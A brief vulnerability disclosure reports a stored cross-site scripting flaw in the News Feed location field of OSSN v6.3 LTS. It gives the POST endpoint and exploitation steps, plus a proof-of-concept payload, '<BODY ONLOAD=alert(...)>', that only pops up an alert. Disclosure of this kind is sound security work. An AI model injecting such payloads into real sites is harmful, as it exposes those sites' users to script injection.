
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.
The attacker must post something on the "news feed" and insert the XSS payload at the location input in order to exploit the stored XSS. The XSS payload will be launched immediately after submission.
http://ip_address:port/ossn/home
POST /ossn/action/wall/post/a?ossn_ts=1656419179&ossn_token=83b0ebdb6b2bbbcbaa0b804ce5cf3b5fba29a25474715bf2f7e4bbbd85316a86
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome Version 102.0.5005.115 (Official Build) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
Reference: